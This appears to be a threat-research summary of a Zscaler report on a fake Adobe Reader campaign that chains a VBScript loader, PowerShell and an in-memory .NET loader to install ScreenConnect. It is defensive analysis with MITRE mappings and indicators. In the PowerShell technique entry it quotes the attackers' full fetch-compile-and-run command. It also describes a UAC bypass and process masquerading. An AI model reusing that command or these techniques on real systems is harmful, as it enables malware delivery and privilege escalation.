Threat Research

In-Memory Loader Drops ScreenConnect

ZScaler
In-Memory Loader Drops ScreenConnect

Zscaler ThreatLabz detailed a multi-stage campaign that used a fake Adobe Acrobat Reader download to deliver a heavily obfuscated VBScript loader which staged PowerShell and an in-memory .NET loader to install ConnectWise ScreenConnect. The chain used runtime string reconstruction, heavy obfuscation, PEB image-name spoofing, and abuse of auto-elevated COM objects to evade detection and obtain elevated privileges. #ScreenConnect #VBS_Downloader

Keypoints

  • Attackers hosted a fraudulent page impersonating Adobe that automatically delivered a heavily obfuscated VBScript loader named Acrobat_Reader_V112_6971.vbs.
  • The VBScript reconstructs object names and commands at runtime to defeat static analysis and launches PowerShell with -ExecutionPolicy Bypass to continue staging.
  • PowerShell compiles and executes a C# in-memory .NET loader (Add-Type -ReferencedAssemblies) that embeds a compiled assembly in a byte array and invokes it via reflection (Assembly.Load(byte[])).
  • The in-memory loader uses PEB manipulation to rewrite the process image name/path (masquerading as C:Windowswinhlp32.exe) to blend with legitimate processes and avoid EDR detection.
  • Attackers abused auto-elevated COM objects (via an elevation moniker and CoGetObject) to bypass UAC and obtain elevated privileges without prompting the user.
  • The final stage downloads and installs ScreenConnect (ScreenConnect.ClientSetup.msi from x0[.]at/qOfN.msi) using curl.exe and msiexec, leaving a legitimate RMM tool installed for post-compromise access.

MITRE Techniques

  • [T1204.002] User Execution: Malicious File – The campaign relied on a user landing on a fake Adobe page that automatically downloaded and delivered a VBScript loader. [‘Upon accessing the page, the victim’s browser automatically downloads a heavily obfuscated VBScript file named Acrobat_Reader_V112_6971.vbs, which serves as a loader.’]
  • [T1059.001] PowerShell – The VBScript launches PowerShell with -ExecutionPolicy Bypass to download, read, and compile C# source in memory. [‘powershell.exe -ExecutionPolicy Bypass -command “”New-Item -ItemType Directory -Path ‘C:WindowsTemp’ -Force | Out-Null; curl.exe -L ‘https://drive.google[.]com/uc?id=1TVJir-OlNZrLjm5FyBMk_hDjG9BV1zCy&export=download’ -o ‘C:WindowsTempFileR.txt’;Start-Sleep -Seconds 8;$source = [System.IO.File]::ReadAllText(‘C:WindowsTempFileR.txt’);Start-Sleep -Seconds 1;Add-Type -ReferencedAssemblies ‘Microsoft.CSharp’ -TypeDefinition $source -Language CSharp; [HelloWorld]::SayHello()””‘]
  • [T1059.005] Visual Basic / VBScript – The initial loader is an obfuscated VBScript that dynamically reconstructs object names and uses Chr() calls to build commands at runtime. [‘the VBScript loader dynamically constructs the object name using nested Replace() functions … The VBScript loader then uses Run() to execute a follow-on command that is assembled from numerous Chr() calls…’]
  • [T1027] Obfuscated Files or Information – Attackers split and reversed method/type names and stored strings in transformed forms to hinder static analysis. [‘the attackers tried to avoid static analysis by splitting up method and type names. For example, “Lo”+”ad” (i.e. “Load”) and “Ent”+”ryPo”+”int” (i.e. “EntryPoint”)’]
  • [T1105] Ingress Tool Transfer – Additional payloads and the ScreenConnect installer were retrieved from external locations (Google Drive and a direct URL). [‘curl.exe -L ‘https://drive.google[.]com/uc?id=1TVJir-… -o ‘C:WindowsTempFileR.txt”]
  • [T1548.002] Abuse Elevation Control Mechanism: Bypass UAC – The loader constructs an elevation moniker (stored reversed) and calls CoGetObject to obtain elevated COM objects for privileged actions. [‘the loader then calls CoGetObject to request the elevated COM object. If this action is successful, the loader returns an interface that can be used for privileged actions’]
  • [T1036] Masquerading – The loader modifies PEB fields (FullDllName and BaseDllName) to present a spoofed process image path/name (C:Windowswinhlp32.exe) to user-mode tools. [‘overwriting FullDllName and BaseDllName to C:Windowswinhlp32.exe / winhlp32.exe’]
  • [T1055] Process Injection / In-memory Execution – The .NET component loads an embedded assembly from a byte array and invokes its entry point entirely in memory via Assembly.Load(byte[]) and EntryPoint.Invoke(). [‘the loader then uses SayHello() and reflection to load the assembly via Assembly.Load(byte[]) and invoke the assembly’s entry point using EntryPoint.Invoke().’]

Indicators of Compromise

  • [File Hash ] VBScript and assembly hashes observed in the campaign – E4B594A18FC2A6EE164A76BDEA980BC0 (VBS), 3EFFADB977EDDD4C48C7850C8DC03B13C (.NET assembly), and 6 more hashes.
  • [URL / Domain ] Fraudulent lure and installer download URLs – eshareflies[.]im/ad/ (fraudulent Adobe page), https://x0[.]at/qOfN.msi (ScreenConnect.ClientSetup.msi).
  • [Cloud storage links ] Staging and payload hosting on Google Drive – drive.google[.]com/uc?id=1TVJir-OlNZrLjm5FyBMk_hDjG9BV1zCy&export=download, drive.google[.]com/uc?id=1pyyQRpUmH0YtPG-VqvMNzKUo9i8-RZ7L&export=download.
  • [File Names ] Downloaded and staged filenames used by loaders – Acrobat_Reader_V112_6971.vbs (VBScript loader), ScreenConnect.ClientSetup.msi (installer from x0[.]at/qOfN.msi).
  • [File Type ] MSI installer used for final deployment – ScreenConnect.ClientSetup.msi (downloaded and executed via msiexec).

Read more: https://www.zscaler.com/blogs/security-research/memory-loader-drops-screenconnect